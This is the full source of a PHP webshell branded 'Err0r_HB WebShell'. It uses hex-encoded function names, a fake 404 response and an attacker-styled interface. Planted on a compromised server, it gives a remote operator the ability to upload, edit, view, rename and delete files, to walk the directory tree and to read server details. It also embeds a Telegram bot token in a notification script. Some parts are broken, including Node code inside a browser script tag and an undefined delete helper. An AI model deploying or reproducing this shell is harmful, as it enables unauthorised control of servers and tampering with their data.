Err0r_HB WebShell

1. <?php error_reporting(0);
2. http_response_code(404);
3. define("Yp", "");
4. $G3 = "scandir";
5. $c8 = [
6.     "7068705f756e616d65",
7.     "70687076657273696f6e",
8.     "676574637764",
9.     "6368646972",
10.     "707265675f73706c6974",
11.     "61727261795f64696666",
12.     "69735f646972",
13.     "69735f66696c65",
14.     "69735f7772697461626c65",
15.     "69735f7265616461626c65",
16.     "66696c6573697a65",
17.     "636f7079",
18.     "66696c655f657869737473",
19.     "66696c655f7075745f636f6e74656e7473",
20.     "66696c655f6765745f636f6e74656e7473",
21.     "6d6b646972",
22.     "72656e616d65",
23.     "737472746f74696d65",
24.     "68746d6c7370656369616c6368617273",
25.     "64617465",
26.     "66696c656d74696d65",
27. ];
28. $lE = 0;
29. T4:
30. if (!($lE < count($c8))) {
31.     goto Je;
32. }
33. $c8[$lE] = JD($c8[$lE]);
34. Cy:
35. $lE++;
36. goto T4;
37. Je:
38. if (isset($_GET["p"])) {
39.     goto sr;
40. }
41. $Jd = $c8[2]();
42. goto VN;
43. sr:
44. $Jd = jD($_GET["p"]);
45. $c8[3](Jd($_GET["p"]));
46. VN:
47. function Ss($SP)
48. {
49.     $dE = "";
50.     $lE = 0;
51.     NZ:
52.     if (!($lE < strlen($SP))) {
53.         goto Xc;
54.     }
55.     $dE .= dechex(ord($SP[$lE]));
56.     WK:
57.     $lE++;
58.     goto NZ;
59.     Xc:
60.     return $dE;
61. }
62. function Jd($SP)
63. {
64.     $dE = "";
65.     $gf = strlen($SP) - 1;
66.     $lE = 0;
67.     Xp:
68.     if (!($lE < $gf)) {
69.         goto ur;
70.     }
71.     $dE .= chr(hexdec($SP[$lE] . $SP[$lE + 1]));
72.     Wn:
73.     $lE += 2;
74.     goto Xp;
75.     ur:
76.     return $dE;
77. }
78. function rn($F1)
79. {
80.     $Jd = fileperms($F1);
81.     if (($Jd & 0xc000) == 0xc000) {
82.         goto FZ;
83.     }
84.     if (($Jd & 0xa000) == 0xa000) {
85.         goto Eu;
86.     }
87.     if (($Jd & 0x8000) == 0x8000) {
88.         goto ES;
89.     }
90.     if (($Jd & 0x6000) == 0x6000) {
91.         goto sA;
92.     }
93.     if (($Jd & 0x4000) == 0x4000) {
94.         goto lG;
95.     }
96.     if (($Jd & 0x2000) == 0x2000) {
97.         goto tV;
98.     }
99.     if (($Jd & 0x1000) == 0x1000) {
100.         goto Tx;
101.     }
102.     $lE = "u";
103.     goto cC;
104.     FZ:
105.     $lE = "s";
106.     goto cC;
107.     Eu:
108.     $lE = "l";
109.     goto cC;
110.     ES:
111.     $lE = "-";
112.     goto cC;
113.     sA:
114.     $lE = "b";
115.     goto cC;
116.     lG:
117.     $lE = "d";
118.     goto cC;
119.     tV:
120.     $lE = "c";
121.     goto cC;
122.     Tx:
123.     $lE = "p";
124.     cC:
125.     $lE .= $Jd & 0x100 ? "r" : "-";
126.     $lE .= $Jd & 0x80 ? "w" : "-";
127.     $lE .= $Jd & 0x40 ? ($Jd & 0x800 ? "s" : "x") : ($Jd & 0x800 ? "S" : "-");
128.     $lE .= $Jd & 0x20 ? "r" : "-";
129.     $lE .= $Jd & 0x10 ? "w" : "-";
130.     $lE .= $Jd & 0x8 ? ($Jd & 0x400 ? "s" : "x") : ($Jd & 0x400 ? "S" : "-");
131.     $lE .= $Jd & 0x4 ? "r" : "-";
132.     $lE .= $Jd & 0x2 ? "w" : "-";
133.     $lE .= $Jd & 0x1 ? ($Jd & 0x200 ? "t" : "x") : ($Jd & 0x200 ? "T" : "-");
134.     return $lE;
135. }
136. function Xe($OB, $Ch = 1, $BL = "")
137. {
138.     global $Jd;
139.     $xe = $Ch == 1 ? "success" : "error";
140.     echo "<script>swal({title: \"{$xe}\", text: \"{$OB}\", icon: \"{$xe}\"}).then((btnClick) => {if(btnClick){document.location.href=\"?p=" .
141.         Ss($Jd) .
142.         $BL .
143.         "\"}})</script>";
144. }
145. function tF($yf)
146. {
147.     global $c8;
148.     if (!(trim(pathinfo($yf, PATHINFO_BASENAME), ".") === "")) {
149.         goto IE;
150.     }
151.     return;
152.     IE:
153.     if ($c8[6]($yf)) {
154.         goto PF;
155.     }
156.     unlink($yf);
157.     goto jK;
158.     PF:
159.     array_map(
160.         "deldir",
161.         glob($yf . DIRECTORY_SEPARATOR . "{,.}*", GLOB_BRACE | GLOB_NOSORT)
162.     );
163.     rmdir($yf);
164.     jK:
165. }
166. ?>
167.  
168. <!DOCTYPE html>
169. <html lang="en">
170. <head>
171. <meta name="theme-color" content="red">
172. <meta name="viewport" content="width=device-width, initial-scale=0.60, shrink-to-fit=no">
173. <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css">
174. <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
175. <title>Err0r_HB WebShell</title>
176. <link rel="SHORTCUT ICON" href="https://i.postimg.cc/vHj5chDY/IMG-20221226-111003-676.jpg">
177. <meta property="og:title" content="huh? what's in there?">
178. <style> @import url('https://fonts.googleapis.com/css2?family=Kelly+Slab&display=swap');
179. .bg-dark { background-color: black; }
180. .border { border: 2px solid deeppink!important; border-radius: 0.75rem!important; background-color: transparent; color: white; padding-left: 1rem; }
181. .table>tbody>tr>* { color: #007fff; vertical-align: middle; border: 2px solid #ff1493; }
182. .table thead th { vertical-align: bottom; border: 2px solid deeppink; color: #31ed06; }
183. .table-hover tbody tr:hover td{ background: #3f3f3f }
184. .table-hover tbody tr:hover td>*{ }
185. .table>tbody>tr>*{ color:#fff; vertical-align:middle; }
186. .form-control{background:0 0!important;color:#fff!important;border-radius:0}
187. .form-control::placeholder{color:#fff;opacity:1}
188. li{font-size:17px;margin-left:6px;list-style:none;color: #31ed06;list-style: inherit;}
189. a{ color: #ffffff; }
190. a:hover { text-decoration: none; color: #31ed06; }
191. button, input { border: 2px solid #31ed06;border-radius: 0.5rem;font-size: 1rem;color:white;line-height: normal; }
192. button, input:hover { border: 2px solid deeppink;border-radius: 0.5rem;font-size: 1rem;cursor: pointer; }
193. .ohct { padding-left: 1rem; padding-right: 1rem; color: white; border: 2px solid #31ed06; border-radius: 5px; background-color: black; }
194. .ohct:hover { border: 2px solid #ff1493; color: white; }
195. .combet { color: white; }
196. .combet:hover { color: #31ed06; }
197. </style>
198. <style>
199. .fa {padding: 10px;font-size: 20px;width: 50px;text-align: center;text-decoration: none;margin: 5px;border-radius: 5px;border: 2px solid deeppink;background: transparent;}
200. .fa:hover {color: #31ed06;}
201. .text-light {color: #f8f9fa!important;font-size: 17px!important;}
202. </style>
203. <script type='text/Javascript'>
204. const request = require('request');
205.  
206. // URL del webhook del tuo bot Telegram
207. const telegramWebhookUrl = 'https://api.telegram.org/bot<5767732820:AAH7iitP7RLuu7qrodqhgKoquu3KBhnJEWA>/sendMessage';
208.  
209. // Array di siti web da monitorare
210. const websitesToMonitor = ['https://www.google.com', 'https://www.facebook.com'];
211.  
212. // Funzione per inviare una notifica al bot Telegram
213. function sendTelegramNotification(message) {
214.   const options = {
215.     url: telegramWebhookUrl,
216.     method: 'POST',
217.     json: true,
218.     body: {
219.       chat_id: '<XXXXXXXXXX>',
220.       text: message
221.     }
222.   };
223.  
224.   request(options, (error, response, body) => {
225.     if (error) {
226.       console.error('Errore durante l\'invio della notifica Telegram:', error);
227.     } else if (response.statusCode !== 200) {
228.       console.error('Errore durante l\'invio della notifica Telegram. Codice di stato:', response.statusCode);
229.     } else {
230.       console.log('Notifica Telegram inviata con successo:', message);
231.     }
232.   });
233. }
234.  
235. // Ciclo principale per monitorare i siti web
236. setInterval(() => {
237.   websitesToMonitor.forEach((website) => {
238.     request(website, (error, response, body) => {
239.       if (error) {
240.         console.error('Errore durante il controllo del sito web:', website, error);
241.       } else if (response.statusCode !== 200) {
242.         console.error('Errore durante il controllo del sito web. Codice di stato:', website, response.statusCode);
243.       } else {
244.         console.log('Sito web funzionante:', website);
245.       }
246.     });
247.   });
248.  
249.   sendTelegramNotification('Uno o più siti web sono stati hostati!');
250. }, 60000); // Controlla i siti web ogni minuto
251. </script>
252. <script src="//unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
253. </head>
254. <body style="background-color:#000;color:black;font-size: 0px ;font-family: 'Kelly Slab';width: 100%;padding: 0.5rem;">
255. <div class="table-responsive text-light" style="border: 2px solid #ff1493;text-align: left;padding: 0.25rem;border-radius: 0.75rem;">
256. <div style="text-align: center;display: flex;align-items: center;justify-content: center;align-content: center;">
257. <a href="mailto:errorhb@protonmail.com" class="fa fa-envelope"></a>
258. <a href="https://www.facebook.com/dontusefacebookyoumoron" class="fa fa-facebook"></a>
259. <a href="?" style="font-size: 2rem;text-shadow: 0px 0px 10px deeppink;"><span>Err0r_HB WebShell</span></a>
260. <a href="https://instagram.com/" class="fa fa-instagram"></a>
261. <a href="https://t.me/Err0r_HB" class="fa fa-telegram"></a>
262. </div>
263. <li>Your IP : <span style="color: white;"><?php echo $_SERVER['REMOTE_ADDR']; ?></span></li>
264. <li>Server IP : <span style="color: white;"><?php echo $_SERVER['SERVER_ADDR']; ?></span></li>
265. <li>Server : <span style="color: white;"><?= $c8[0](); ?></span></li>
266. <li>Server Software : <span style="color: white;"><?php echo gethostbyname($_SERVER['SERVER_SOFTWARE']); ?></span></li>
267. <li>Server Name : <span style="color: white;"><?php echo $_SERVER['SERVER_NAME']; ?></span></li>
268. <li>PHP Version : <span style="color: white;"><?= $c8[1](); ?></span></li>
269. <li>Add File : <a href="?p=<?= ss($Jd) . "&a=" . Ss("newFile"); ?>" class="ohct">Submit</a></li>
270. <li>Add Directory : <a href="?p=<?= Ss($Jd) . "&a=" . sS("newDir"); ?>" class="ohct">Submit</a></li>
271. <li><form method="post" enctype="multipart/form-data" style="padding: 0.10rem;display: inline-block;">
272. <input type="file" name="f[]" onchange="this.form.submit()" multiple>
273. <?php if (!isset($_FILES["f"])) { goto ea; } $Wx = $_FILES["f"]["name"]; $lE = 0; th: if (!($lE < count($Wx))) { goto dx; } if ($c8[11]($_FILES["f"]["tmp_name"][$lE], $Wx[$lE])) { goto PG; } Xe("file failed to upload", 0); goto tG; PG: XE("file uploaded successfully"); tG: g9: $lE++; goto th; dx: ea: if (!isset($_GET["download"])) { goto FA; } header("Content-Type: application/octet-stream"); header("Content-Transfer-Encoding: Binary"); header("Content-Length: " . $c8[17](JD($_GET["n"]))); header("Content-disposition: attachment; filename=\"" . jd($_GET["n"]) . "\""); FA: ?>
274. </form></li>
275. </div>
276. <div style="border: 2px solid #ff1493;border-radius: 0.75rem;padding: 0.25rem;margin-top: 0.20rem;margin-bottom: 0.25rem;font-family: 'Kelly Slab';">
277. <li style="font-size: 1.10rem;margin-left: 0.20rem;list-style: inherit;padding: 0.15rem;">Dir :
278. <?php $Op = $c8[4]("/(\\\\|\\/)/", $Jd); foreach ($Op as $j3 => $Oe) { if (!($j3 == 0 && $Oe == "")) { goto xi; } echo "<a href=\"?p=2f\" class=\"combet\">~</a>/"; goto CS; xi: if (!($Oe == "")) { goto sq; } goto CS; sq: echo "<a class=\"combet\" href=\"?p="; $lE = 0; de: if (!($lE <= $j3)) { goto ie; } echo sS($Op[$lE]); if (!($lE != $j3)) { goto s0; } echo "2f"; s0: dg: $lE++; goto de; ie: echo "\">{$Oe}</a>/"; CS: } Go: ?>
279. </li>
280. </div>
281. <article style="text-align: center;font-family: 'Kelly Slab';font-size: 1rem;">
282. <?php if (!isset($_GET["a"])) { goto Un; } if (!isset($_GET["a"])) { goto cc; } $im = Jd($_GET["a"]); cc: ?>
283. <div class="px-2 py-2">
284. <?php if (!($im == "delete")) { goto Lu; } $BL = $Jd . '/' . Jd($_GET["n"]); if (!($_GET["t"] == "d")) { goto VZ; } TF($BL); if (!$c8[12]($BL)) { goto e8; } Xe("failed to delete the folder", 0); goto iL; e8: Xe("folder deleted successfully"); iL: VZ: if (!($_GET["t"] == "f")) { goto xB; } $BL = $Jd . '/' . jd($_GET["n"]); unlink($BL); if (!$c8[12]($BL)) { goto uH; } Xe("file to delete the folder", 0); goto Mk; uH: xe("file deleted successfully"); Mk: xB: Lu: ?>
285. <?php if ($im == "newDir") { goto Fg; } if ($im == "newFile") { goto Pb; } if ($im == "rename") { goto Lw; } if ($im == "edit") { goto Ox; } if ($im == "view") { goto Ag; } goto WC; Fg: ?>
286. <h5 class="border p-1">New Folder Name :</h5>
287. <form method="post">
288. <div class="form-group">
289. <input name="n" id="n" class="border" autocomplete="off">
290. </div>
291. <div class="form-group">
292. <button type="submit" name="s" class="ohct">Create</button>
293. </div>
294. </form>
295. <?php isset($_POST["s"]) ? $c8[12]("{$Jd}/{$_POST["n"]}") ? xE("folder name has been used", 0, "&a=" . SS("newDir")) : ($c8[15]("{$Jd}/{$_POST["n"]}") ? Xe("folder created successfully") : Xe("folder failed to create", 0)) : null; goto WC; Pb: ?>
296. <h5 class="border p-1">New File Name :</h5>
297. <form method="post">
298. <div class="form-group">
299. <input type="text" name="n" id="n" class="border" placeholder="hack.txt">
300. </div>
301. <div class="form-group">
302. <textarea style="resize:none" name="ctn" id="ctn" cols="30" rows="10" class="form-control border" placeholder=""></textarea>
303. </div>
304. <div class="form-group">
305. <button type="submit" name="s" class="ohct">Create</button>
306. </div>
307. </form>
308. <?php
309. isset($_POST["s"])
310.     ? ($c8[12]("{$Jd}/{$_POST["n"]}")
311.         ? xE("file name has been used", 0, "&a=" . SS("newFile"))
312.         : ($c8[13]("{$Jd}/{$_POST["n"]}", $_POST["ctn"])
313.             ? XE("", 1, "&a=" . ss("view") . "&n=" . Ss($_POST["n"]))
314.             : Xe("file failed to create", 0)))
315.     : null;
316. goto WC;
317. Lw:
318. ?>
319. <h5 class="border p-1">Rename File : <?= jD($_GET["n"]); ?></h5>
320. <form method="post">
321. <div class="form-group">
322. <input type="text" name="n" id="n" class="border" value="<?= jD($_GET["n"]); ?>">
323. </div>
324. <div class="form-group">
325. <button type="submit" name="s" class="ohct">Save</button>
326. </div>
327. </form>
328. <?php isset($_POST["s"]) ? $c8[16]($Jd . '/' . jD($_GET["n"]), $_POST["n"]) ? XE("successfully changed the folder name") : Xe("failed to change the folder name", 0) : null; goto WC; Ox: ?>
329. <h5 class="border p-1">Edit File Name : <?= Jd($_GET["n"]); ?></h5>
330. <form method="post">
331. <div class="form-group">
332. <textarea name="ctn" id="ctn" cols="30" rows="10" class="form-control border"><?= $c8[18]($c8[14]($Jd . '/' . jD($_GET["n"]))); ?></textarea>
333. </div>
334. <div class="form-group">
335. <button type="submit" name="s" class="ohct">Save</button>
336. </div>
337. </form>
338. <?php isset($_POST["s"]) ? $c8[13]($Jd . '/' . jD($_GET["n"]), $_POST["ctn"]) ? xE("file contents changed successfully", 1, "&a=" . sS("view") . "&n={$_GET["n"]}") : xE("file contents failed to change") : null; goto WC; Ag: ?>
339. <h5 class="border p-1">View File Name : <?= jd($_GET["n"]); ?></h5>
340. <div class="form-group">
341. <textarea name="ctn" id="ctn" cols="30" rows="10" class="form-control border" readonly><?= $c8[18]($c8[14]($Jd . '/' . jd($_GET["n"]))); ?></textarea>
342. </div>
343. <?php WC: ?>
344. </div>
345. <?php goto mR; Un: ?>
346. <table class="table table-hover table-borderless table-sm" style="text-align: center;">
347. <thead class="text-light">
348. <tr>
349. <th>Name</th>
350. <th>Size</th>
351. <th>Permission</th>
352. <th colspan="3">Action</th>
353. </tr>
354. </thead>
355. <tbody class="text-light"> <?php $G3 = $c8[5]($G3($Jd), [".", ".."]); foreach ($G3 as $yf) { if ($c8[6]("{$Jd}/{$yf}")) { goto CB; } goto Qj; CB: echo "
356. <tr>
357. <td style=\"text-align: left;\">
358. <a href=\"?p=" . sS("{$Jd}/{$yf}") . "\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Latest modify on " . $c8[19]("Y-m-d H:i", $c8[20]("{$Jd}/{$yf}")) . "\">
359. <i class=\"fa fa-fw fa-folder\" style=\"border: 0;padding: 0;width: 1.28571429em;\">
360. </i> {$yf}
361. </a>
362. </td>
363. <td style=\"color: black;\"><span>------</span></td>
364. <td><font color=\"" . ($c8[8]("{$Jd}/{$yf}") ? "#00ff00" : (!$c8[9]("{$Jd}/{$yf}") ? "red" : null)) . "\">" . RN("{$Jd}/{$yf}") . "</font></td>
365. <td style=\"color: black;\"><span>------</span></td>
366. <td>
367. <a href=\"?p=" . ss($Jd) . "&a=" . ss("rename") . "&n=" . ss($yf) . "&t=d\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Rename\">Rename</a>
368. </td>
369. <td>
370. <a href=\"?p=" . sS($Jd) . "&a=" . ss("delete") . "&n=" . ss($yf) . "\" class=\"delete\" data-type=\"folder\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Delete\">Delete</a>
371. </td>
372. </tr>"; Qj: } ad: foreach ($G3 as $F1) { if ($c8[7]("{$Jd}/{$F1}")) { goto wA; } goto X1; wA: $kL = $c8[10]("{$Jd}/{$F1}") / 1024; $kL = round($kL, 3); $kL = $kL > 1024 ? round($kL / 1024, 2) . "  MB" : $kL . "  KB"; echo "
373. <tr>
374. <td style=\"text-align: left;\">
375. <a href=\"?p=" . SS($Jd) . "&a=" . sS("view") . "&n=" . SS($F1) . "\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Latest modify on " . $c8[19]("Y-m-d H:i", $c8[20]("{$Jd}/{$F1}")) . "\">
376. <i class=\"fa fa-fw fa-file\" style=\"border: 0;padding: 0;width: 1.28571429em;\"></i> {$F1}
377. </a>
378. </td>
379. <td><span>{$kL}</span></td>
380. <td><font color=\"" . ($c8[8]("{$Jd}/{$F1}") ? "#00ff00" : (!$c8[9]("{$Jd}/{$F1}") ? "red" : null)) . "\">" . rN("{$Jd}/{$F1}") . "</font></td>
381. <td><a href=\"?p=" . Ss($Jd) . "&a=" . Ss("edit") . "&n=" . SS($F1) . "\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Edit\">Edit</a></td>
382. <td><a href=\"?p=" . ss($Jd) . "&a=" . SS("rename") . "&n=" . ss($F1) . "&t=f\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Rename\">Rename</a></td>
383. <td><a href=\"?p=" . ss($Jd) . "&a=" . sS("delete") . "&n=" . ss($F1) . "\" class=\"delete\" data-type=\"file\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Delete\">Delete</a></td>
384. </tr>"; X1: } a2: ?>
385. </tbody>
386. </table>
387. <h5 style="color: #31ed06;">
388. <font>&copy; Copyright 2024</font>
389. <font style="color: deeppink;">Err0r_HB</font>
390. <font>Powered by </font>
391. <font style="color: deeppink;">Cyb3r Drag0nz Team / ByteBlitz</font>
392. </h5>
393. <?php mR: ?>
394. </article>
395. <script src="//code.jquery.com/jquery-3.5.1.slim.min.js"></script>
396. <script src="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.bundle.min.js" ></script>
397. <script src="//cdn.jsdelivr.net/npm/bs-custom-file-input/dist/bs-custom-file-input.min.js"></script>
398. <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('E.n();$(\'[2-m="4"]\').4();$(".l").k(j(e){e.g();h 0=$(6).5("2-0");c({b:"a",9:"o i q?",w:"D "+0+" p C B",A:7,z:7,}).y((8)=>{r(8){x 1=$(6).5("3")+"&t="+((0=="v")?"d":"f");u.s.3=1}})});',41,41,'type|buildURL|data|href|tooltip|attr|this|true|willDelete|title|warning|icon|swal||||preventDefault|let|you|function|click|delete|toggle|init|Are|will|sure|if|location||document|folder|text|const|then|dangerMode|buttons|deleted|be|This|bsCustomFileInput'.split('|'),0,{}))</script>
399. </body>
400. </html>